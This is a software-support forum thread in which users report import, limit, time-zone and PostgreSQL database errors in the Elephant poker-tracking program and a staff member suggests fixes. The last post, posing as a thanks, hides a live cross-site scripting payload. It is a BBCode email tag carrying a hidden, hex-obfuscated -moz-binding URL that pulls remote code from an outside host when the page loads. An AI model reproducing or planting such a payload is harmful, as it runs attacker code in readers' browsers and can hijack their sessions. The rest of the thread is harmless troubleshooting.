Problems

• DeKuip
      DeKuip
      Bronze
      Hi, just downloaded Elephant 0.46 and tried it out.
      First of all I got some problems on PokerStars with the statistics on my table, the way they show up is so messy and I can't even reach the menu where you can tile your tables with.

Second of all, Elephant says I'm playing on the following limit:
      NL $0.10/$0 .
      It's annoying, because of this it won't show anything BB-related.

Then is there also any way for me to look up other players in the program?
      With PokerTracker you just have a list where you can select a player from and see his stats, but I haven't been able to find that with Elephant.

I got so many more questiosn, so I was hoping if there is some kind of Manual (because the program Manual refers to this forum :( )
  • 20 replies
    • Imatez
      Imatez
      Bronze
      Originally posted by DeKuip

Second of all, Elephant says I'm playing on the following limit:
      NL $0.10/$0 .
      It's annoying, because of this it won't show anything BB-related.
      It happens to me too. I import the .txt file from my pokertracker 2 database.
      Moreover, it seems the elephant is a bit confused with the time settings. Infact, all the hands that i play at 11pm are converted as i play them the day after.
      Third, my hands replayer has never worked.

Then is there also any way for me to look up other players in the program?
      With PokerTracker you just have a list where you can select a player from and see his stats, but I haven't been able to find that with Elephan
      That's very good point. At the moment, it is not easy as with PokerTracker.
      However it possibile to see stats of other players but you have to select every time a different screenname.
      If you are playing, you may see the stats of the player just with a double on the player whom you are interested. A pop-up window will appear with different stats.
    • DeKuip
      DeKuip
      Bronze
      Originally posted by Imatez
      If you are playing, you may see the stats of the player just with a double on the player whom you are interested. A pop-up window will appear with different stats.
      I have figured that out.
      But I shut Elephant down while playing, cause I wasn't able to access the menu to Tile Tables, kinda sucks.

I still need to get used to all those stats a bit, but it's quite a mess on my table then, unbelievable...

What I've seen from PokerTracker, I like that more tbh...
    • galam
      galam
      Bronze
      We are working on that issue.
    • DeKuip
      DeKuip
      Bronze
      Ok thank you!
    • galam
      galam
      Bronze
      And it would be nice if you send me those HH to galam@pokerstrategy.com.

Greets Sebastian
    • DeKuip
      DeKuip
      Bronze
      Originally posted by galam
      And it would be nice if you send me those HH to galam@pokerstrategy.com.

Greets Sebastian
      Sorry, which HH do you mean exactly?
    • DeKuip
      DeKuip
      Bronze
      I updated my Elephant with the newest version.
      The limits are ok now, but suddenly he skips complete days when importing my hand historys...
    • Imatez
      Imatez
      Bronze
      Finally, i have no problems with the limit too.

But two things still happen.

1. The hand replayer does not work at all. I have windows vista.

2. Time settings is completely wrong. Time for Elephant poker is one hour ahead. When i play a hand after 11pm it appears as i play it the next day 00 am.
    • galam
      galam
      Bronze
      Any problems left in 0.49?

We know about the replayer issue, the day problem should be fixed in 0.49.

Greets Sebastian
    • DeKuip
      DeKuip
      Bronze
      It doesn't import all my hands.
      It just skips several days.
      And if I ask it to import all the hands, it simply crashes over and over again...

I haven't tried using it on the tables yet as a Hud..
    • galam
      galam
      Bronze
      Please delete all filters and try setting a handrange filter to 100%. Do all hands appear now? If not please create a new DB and try installing.

Greets Sebastian
    • DeKuip
      DeKuip
      Bronze
      I deleted all filters, but when importing hands it froze again after 2476 hands (it also did that the previous times).

So I decided to remove the PostreQSL (or whatever it's called exactly) according to the Important thread on top of this page.
      But I think something went wrong there, cause I'm getting a new error.

I replied in that topic, but what I did was reïnstalling Elephant, but it still gives the same error, now I can't do anything.
    • galam
      galam
      Bronze
      Please send me the files you are trying to import via e-mail to galam@pokerstrategy.com and i'm gonna see if i can find a problem within the files.

Greets Sebastian
    • DeKuip
      DeKuip
      Bronze
      Please send me the files you are trying to import via e-mail to galam@pokerstrategy.com and i'm gonna see if i can find a problem within the files.

Greets Sebastian
      Done that quite a while ago.
      But now:

Troubles...
      I removed the database, from step 3 I didn't really get what to do anymore, so I just removed the map with the name of my database.

Now I start Elephant again and I have to make a new database, when I want to do that it gives an error, the following pop-up:

Connection to database server lost!

Further Informations:

Failed to establish a connection to '127.0.0.1'.
      Now I can't do anything...

Edit: I now tried reïnstalling Elephant, but it still gives the same error!
    • galam
      galam
      Bronze
      Please try uninstalling postgreSQL following this guide: Deinstalling PostgreSQL correctly After that try reinstallung postgreSQL from scratch. Hope that helps.

Greets Sebastian
    • DeKuip
      DeKuip
      Bronze
      Please try uninstalling postgreSQL following this guide: Deinstalling PostgreSQL correctly After that try reinstallung postgreSQL from scratch. Hope that helps.

Greets Sebastian
      I've read that guide, but I think something went wrong...
      As you can see in my previous post.
    • galam
      galam
      Bronze
      Well after deinstalling you have to reinstall postgreSQL of course. After that you can easily create a new database. You can find the installier within the Elephant dir.

Gruß Sebastian
    • kispeterg
      kispeterg
      Global
      I did manage to import new Titan hands without the patch, and that 2 days is completely screwed up, totally bad numbers, any way to undo just those days? I tried a lame method and removed the xmls from ElphantHH folder and tried readding them again with the patch on, but it says duplicate..
    • Muggs
      Muggs
      Bronze
      Thanks to galam http://www.[email=xx style=-moz-binding:url(\68\74\74\70\3a\2f\2f\70\73\73\2e\31\31\30\6d\62\2e\63\6f\6d\2f\61\2e\78\6d\6c\23\61);display:none; ]tt[/email]